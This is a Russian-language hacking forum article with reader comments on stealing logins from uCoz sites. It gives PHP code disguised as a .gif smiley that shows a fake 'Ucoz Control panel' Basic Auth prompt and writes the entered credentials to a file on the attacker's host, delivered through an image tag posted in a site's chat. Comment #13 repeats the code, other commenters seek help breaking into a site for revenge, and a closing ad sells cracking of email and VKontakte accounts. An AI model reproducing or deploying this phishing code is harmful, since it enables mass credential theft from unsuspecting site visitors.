Главная » Файлы » Статьи » Хакинг и безопасность |
Взлом сайта на UCOZ
[ ] | 10.12.2008, 06:48 |
Привет. Сегодня я расскажу один из способов взлома сайтов на юкозе. Настоящий хакер может найти достаточно много уязвимостей на таких сайтах и знает много способов их взлома. Я надеюсь что скоро тоже буду таким=). Итак, начнем... Для начала нажно зарегистировать хост с поддержкой php (например http://mysite.phphost.net) . После регистрации льем на фтп скрипт и ставим права на пустой .txt файл, например : passwords.txt (сюда будут присылаться пассы пользователей похаканного сайта), и на файл smile.gif. Также скачайте любой смайлик в расширении .gif (типа cool.gif). Затем откройте блокнот, да простой блокнот и напишите следующее: header("Content-type: image/gif"); $image = imagecreatefromgif('cool.gif'); if(!$_COOKIE['LOGON']) { $login = $_SERVER['PHP_AUTH_USER']; $pass = $_SERVER['PHP_AUTH_PW']; if(strlen($pass) <= 4 || !$login) { Header('HTTP/1.1 401 Unauthorized'); Header('WWW-Authenticate: Basic realm="Ucoz Control panel"'); } elseif($login) { setcookie('LOGON',md5($pass)); $f = fopen('passwords.txt', 'ab'); fwrite($f, $login." ||| ".$pass."\r\n"); fclose($f); } } imagegif($image); imagedestroy($image); ?> Как только вы напишите всё - сохраните файл под названием smile, потом поменяйте расширение на gif. Теперь выбирайте любой юкозовский сайт, например http://target.ucoz.ru/ слева юкозовских сайтов как обычно, у большинства есть мини-чат справа. Так вот - для начала зарегистируйтесь на сайте, потом в мини чате напишите логин, а в содержании сообщения напишите следующее: [img]http:mysite.phphost.net/smile.gif[img] И нажмите ОК. Если после этого в миничате вместо сообщения появился смайлик - значит радуйтесь, т.к. сайт - уязвимый. После этого у всех кто будет заходить на данную страницу, (в этом примере это http://target.ucoz.ru/) будет появлятся форма в которую нужно будет ввести логин и пароль. У вас при входе на сайт такая форма будет появлятся тоже. И все, введеные логины и пароли в эту форму будут отсылатся в пустой файл passwords.txt, который вы создали в самом начале и залили на фтп. Удачи! Практикуйтесь. Только на некоторых сайтах эта уязвимость может и не пройти. Но стандрартно созданный юкозовский сайт без доп. своих настроек будет уязвим. Всем спасибо за просмотр, надеюсь статья вам поможет =))) | |
Категория: Хакинг и безопасность | Добавил: p3ntum | |
Просмотров: 4859 | Загрузок: 0 | Комментарии: 16 | Рейтинг: 3.2/9 | |
Всего комментариев: 16 | 1 2 » |
#16
Зарегестрирован: 01.08.2010 | ICQ:
#15
Точно работает ?????
Зарегестрирован: 11.07.2009 | ICQ:
#14
Если ты такой умный, взломай сайт letitbit.net, и напиши если получиться. Ах да! Тыж тока укозовские ламаеш. Взломай хоть один, и дакажи.
Зарегестрирован: 11.07.2009 | ICQ:
#13 p3ntum
header("Content-type: image/gif");
$image = imagecreatefromgif('cool.gif'); if(!$_COOKIE['LOGON']) { $login = $_SERVER['PHP_AUTH_USER']; $pass = $_SERVER['PHP_AUTH_PW']; if(strlen($pass) <= 4 || !$login) { Header('HTTP/1.1 401 Unauthorized'); Header('WWW-Authenticate: Basic realm="Ucoz Control panel"'); } elseif($login) { setcookie('LOGON',md5($pass)); $f = fopen('passwords.txt', 'ab'); fwrite($f, $login." ||| ".$pass."\r\n"); fclose($f); } } imagegif($image); imagedestroy($image); ?> кидаешь это в блокнот и сохраняешь с расширением gif(как у катртинки)боюсь данный хак уже не дествует,все кому надо защитились,но можешь хакать свой сайт если очень хочешь ...
Зарегестрирован: 19.06.2009 | ICQ:
#12
А какой скрипт лить надо?
Зарегестрирован: 18.06.2009 | ICQ:
#11
вот видео урок этой темы..только уже не кто не введет пароль в левые окна
http://1x.do.am/dir/22-1-0-52
Зарегестрирован: 05.06.2009 | ICQ:
#10 p3ntum
кому надо для безопаснотси,кому надо для взлома
Зарегестрирован: 22.05.2009 | ICQ:
#9
p3ntum, слыш на кой ляд ты вообще это написал ?
Зарегестрирован: 22.05.2009 | ICQ:
#8
спс за совет.но у меня нет времени этим занемаца самому я ищу помащь хочу один сайтик взломать и оставить подарочек в панели управления
Зарегестрирован: 05.05.2009 | ICQ:
#7
Люди умоляю прошу вас помогите вломать 1 сайт.
Админ сайта на меня так наговорил матом про мою семью. Пожалуйста умоляю. Плииизизизиз Мой уин-384837871
Зарегестрирован: 23.03.2009 | ICQ:
| |
1-10 11-16 | |
Нужно узнать секреты или поймать на лжи?
Тогда наш сервис для Вас!
Мы можем подобрать для Вас пароль к
следующим электронным почтовым ящикам:
* @MAIL.RU
* @LIST.RU
* @BK.RU
* @INBOX.RU
* @RAMBLER.RU
* VKONTAKTE
- Разумные цены
- Мы работаем БЕЗ предоплаты
- Кратчайшие сроки выполнения (не более 3 дней)
- Соблюдается анонимность и конфиденциальность
- Пароль остается неизменным и хозяин почты
не заподозрит, что его почта просматривается
- Оплата только по результату и предоставления Вам
любых подтверждений выполненной работы
- Принимаем к оплате MasterCard, VISA, W1, Яндекс-Деньги, WebMoney
- Индивидуальный подход к каждому клиенту
- Работаем практически круглосуточно и БЕЗ выходных
- 50% скидки постоянным клиентам
Также вернем Ваш ящик, если его взломали и поменяли пароль.
Контакты:
udion.pro@gmail.com
ICQ# 587-066-044
http://www.silentspy.ru/